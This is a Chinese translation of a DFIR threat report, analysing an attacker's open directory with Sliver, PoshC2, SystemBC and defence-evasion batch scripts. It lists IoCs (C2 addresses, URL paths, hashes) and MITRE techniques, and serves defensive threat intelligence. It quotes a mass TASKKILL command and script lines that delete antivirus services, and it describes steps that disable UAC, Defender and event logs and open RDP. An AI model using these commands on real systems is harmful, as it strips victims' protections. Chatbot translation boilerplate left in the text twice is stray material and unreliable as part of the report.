• • AvastUI.exe f — Avast。

TASKKILL /F /FI "PID ge 1000" /FI "WINDOWTITLE ne untitle*"

脚本中的最后一个命令用于强制停止所有PID为1000或更高的进程，除了那些窗口标题以“untitle”开头的。请注意，原文中的一些命令和参数在翻译时保持原样，以确保技术准确性和参考性。如果您有任何问题或需要进一步的翻译，请随时告诉我。

z1.bat

这是迄今为止在opendir中发现的最为全面的脚本，它包含超过772行命令。它与之前的脚本（z.bat）内容完全相同，并增加了额外的防御规避技术和能力。

rem Delite Service "Hyper-V"
rem Delite Service "AVG"
rem Delite Service "Malwaresbytes"
rem Delite Service "Sofos"
rem Delite Service "Fire_Bird"
rem Delite Service "SQL"
rem Delite Service "AV: Webroot"
rem Delite Service "AV: ESET"
rem Delite Service "AV: Kaspersky"
rem Delite Service "AV: Quick Heal"
rem Delite Service "AV: McAfee"
rem Delite Service "AV: Trend Micro"
rem Delite Service "AV: Panda"

脚本的第一部分删除了针对知名安全防病毒供应商的服务，以及与Hyper-V和Microsoft SQL相关的服务。

脚本的第二部分停止了与MS SQL相关的多个服务，并使用“sc config”命令禁用了相关服务。

这些命令从Windows注册表中删除了各种防病毒和安全服务的注册表项。通过针对HKLMSYSTEMCurrentControlSetservices路径，它们移除了包括Kaspersky、Malwarebytes、McAfee、Norton、Avast、AVG、Avira等在内的安全软件的配置，有效地禁用了这些服务。

脚本的这一部分在之前的脚本中已有讨论。这些主要与Windows设置有关，以启用远程桌面、调整防火墙规则、更改某些实用程序的行为，并更改安全策略。具体来说，它们允许远程桌面连接，创建允许传入远程桌面流量的防火墙规则，并用命令提示符替换各种辅助工具和帮助功能的功能。此外，它们禁用了UAC和Windows Defender，并修改了远程桌面设置，可能削弱了系统安全。请注意，原文中的一些命令和参数在翻译时保持原样，以确保技术准确性和参考性。如果您有任何问题或需要进一步的翻译，请随时告诉我。

攻击目标

在对本次调查中识别出的开放目录进行分析期间，没有发现与目标或受害者相关的任何信息。

IoCs

Atomic

PoshC2 IP Address:
94.198.53.143
185.234.216.64

Extracted C2 URLs:
/webhp/
/adsense/troubleshooter/1631343/
/trader-update/history&pd=/
/status/995598521343541248/query=/
/uasclient/0.1.34/modules/
/utag/lbg/main/prod/utag.15.js/
/GoPro5/black/2018/
/usersync/tradedesk/
/bootstrap/3.1.1/bootstrap.min.js/
/TOS/
/business/home.asp&ved=/
/web/20110920084728/
/vssf/wppo/site/bgroup/visitor/
/Philips/v902/
/bh/sync/aol/
/async/newtab/
/advanced_search/
/adServingData/PROD/TMClient/6/8736/
/vfe01s/1/vsopts.js/
/cisben/marketq/
/business/retail-business/insurance.asp/
/client_204/
/branch-locator/search.asp/
/work/embedded/search/
/babel-polyfill/6.3.14/polyfill.min.js=/
/cdba/
/putil/2018/0/11/po.html/
/qqzddddd/2018/load.php/
/types/translation/v1/articles/
/classroom/sharewidget/widget_stable.html/

SystemBC IP addresses:
94.198.55.181:4337
94.198.51.247:4337

Computed

atera_del.bat
754e08c93369e5bfe24ca09b422affdd
591379f5d7d256e83de05207fd872acfa8e8aa5e
ea7dec8fa52d2300350367691ae2fbea13dbd5bf80d6b43b05eedf197529aa77

atera_del2.bat
3c1853831958efe2cc78ea82b4fbd565
dc14cffa48dd95157fd381cb75bae1773d510c54
512beb7dfa9fdbc8be7fbf59c7bec7911296f9e36c8a3d3b95e7aef4a88bf09c

backup.bat
91be6e6a8b4c2cb99db5b99d40e06978
86f599090aa2c7c1df65dccccf00e1818e72246a
beb5022543a1e12e1f8f5ffe5d520e5fc9cf623aea512cfb43ea2f8c2897420c

clearlog.bat
f7a730acc86f1d6759249ccc579b1794
fe1fb1da6435a6d6283e993569d3fc82a67d7ac8
09f91e90a1604a633c00d6039581f552603421356cb1edb62e085b32ff01b94e

cmd.cmd
5336dffb778b1e2a0b982b337652b213
bd65b5306914187f14bfffa995e7e68a8d036d0c
4106ce787cf73d7f8215311a241f0e42426301a5a2078da9e3349afade2df684

def1.bat
1393dab192ea2e2427889839a2d8fcf7
373609c0f30ee313fd0cc6c4e572452483d87244
0e626e01d3ae7840aa486468f40138284ccbd70dfe336a6b5d4008d01eb79988

defendermalwar.bat
1365640fc3c0e1824e348956172caed7
300c89889bbb5ef61f470174a6fcad73c4516779
5b43428452a867ad61554d763c8f19ca4cd8af8c31194304785e9e45f9258441

delbackup.bat
a8b335886e39adf23e6aa44a00bf82dc
2de53c24663149366fca22f354aff5c0f5b348f4
6cff22a3ea7c054075b9aded5933587bf997623183539e10e426d103d604f046

disable.bat
cc35c94e64830ff143b54783c9869ecf
4a8a4e6069ec4f6a4f24614eb885c57484bc9b79
fdc105ae79dff83f31777c6e047272c5b372251a3af49e20370e7ee9d1c70763

hyp.bat
d1e3216cf698a58832d947d95dc4f3f8
1224f9667d7f1d3b7fba17f414d343912bec03db
08d40a402b3754e52e4e86003bffddfdccbceefd335f53591f4cf715f8d30321

LOGOFALL.bat
9a66570b7e25035ff337fa6098f59823
a65d7caf354161798d2458cfee9e4e988f0e94af
03b3c37300bf9dcfaa4594e86841b70263324dda305484fb268b27deb09f936c

LOGOFALL1.bat
c84e1655f0ba917cc605018e32eba9f3
7dee2a38cc2ba81cc373b50f42c8946601d177cb
3691dbb1834db4eb8ef4c195d26779b87db267a56f2ebca6c146a53fb8adb9c0

native_dropper
444d7a27ac0327ccc0cf4e75a32025c9
8441e7b6b6b9f24439e71c6b031262bc76d73c28
039bf780ae46875945344af489a590c5b7a36d458372a3173b55b3dc3559dfff

NG1.bat
aae5ca4d0e7f000ba5f5250caaed0a05
d08878d7dffe082a908a4bb6387b4739c1a9d3eb
7e623f907b4a4c924cd8af3bf4b8df45b6f904723cbb26ec87cfe7792388afe1

NG2.bat
1a4e569f50695f53bd2368cc322a792d
0a99bd83472444e1bfdd53385fbf2e95bb6dbab9
d97e2e5e6b23ee0f1efa7326d7ac3240a0df9770bf7c2992eec890f073c9cada

ngrok.exe
e2eadf60d8f25cae9b29decab461177b
cecc54143cc375af1b9aed0021643b179574e592
1b60097bf1ccb15a952e5bcc3522cf5c162da68c381a76abc2d5985659e4d386

ON.bat
8c7c782df59edd61aabbc510d7747b11
66ac6cf4bb4247daf1d09d9d4bc4e357cc39c6c8
b0056bef817408449470d3fa43e13cbc89cabdae795b1dc8cbe9905c5946f530

Posh_v2_dropper_x64.exe
a5748047ebbe34d7821a2a040e4ca54e
55126d8215b771aa2f62f16e6aad9e8832824a4c
63229da1bed0c0eafc4ed087651af3eec521e7fbd098300f7d862582d03a675d

py_dropper.sh
679d0dab79a98da8e20351f9f887e4f2
9442647283e52c91c2e836b19749f184936cf6c2
01ec91a3145332174eef9239f7767adaa5e3dff3a436dfb7d2f978f88ea6cd93

setup_uncnow.msi (Atera Remote Admin)
c8903eb5763c670a15049d74d764188c
990f68cca516192d73ef443f51ed80813e324b0b
91d9c73b804aae60057aa93f4296d39ec32a01fe8201f9b73f979d9f9e4aea8b

shadow.bat
4cf52cee2001cd10528f429fb6d9fd07
3cf331934996ec4338418b847b52d78d8a29d224
87ab1707a553557b10fa721a32f053fbb40d11de6f692e96e067d03316fe530b

shadowGuru.bat
0f1290d014dfd9e66bbbed96a828f7d1
b8fc0194f6ed56e4a57c16756e506369c74c4078
2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465

VmManagedSetup.exe (SystemBC proxy malware)
7ee103ee99b95c07cc4a024e4d0fdc03
885fc76ba1261a1dcce87f183a2385b2b99afd96
cc4960939a41d6a281ddad307b107e16214f4aeda261c9b5037f26e60dc7bba2

WILD_PRIDE.exe (Sliver C2)
6b44d99b258c275ee7fcf230da177f3e
833a461f6d479d164b453cc9f5f51259d991b1b7
1aecadf489a6dd7a3a6e5dfda9425673a9d04d38a5cb6b0b8f961536c11237ed

z1.bat
97dc80d3844b01587d9fd6377b9ab0a7
93b717a562f2cc3fdf2355bd9d2670ba2391cc60
a668a98e57c03decf6ea76bb32f67f3f077ef2277e57f4117d44f4342977fddf

z.bat
fe00973fc12b3c6330abd9807dfb1d70
d2f5c890e3e1dd9b42e695586c06408b31d4ec7a
38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955

MITRE

Accessibility Features - T1546.008
Account Access Removal - T1531
Application Layer Protocol - T1071
Asymmetric Cryptography - T1573.002
Clear Windows Event Logs - T1070.001
Deobfuscate/Decode Files or Information - T1140
Disable or Modify Tools - T1562.001
Disable Windows Event Logging - T1562.002
Encrypted Channel - T1573
Inhibit System Recovery - T1490
Modify Registry - T1112
PowerShell - T1059.001
Proxy - T1090
Python - T1059.006
Registry Run Keys / Startup Folder - T1547.001
Remote Access Software - T1219
Service Stop - T1489
System Owner/User Discovery - T1033
Web Protocols - T1071.001
Windows Command Shell - T1059.003

分享，点赞，在看，

都在这儿,点我不香吗？

原文始发于微信公众号（Desync InfoSec）：【DFIR报告翻译】攻击者的武器库：sliver,poshC2和批处理脚本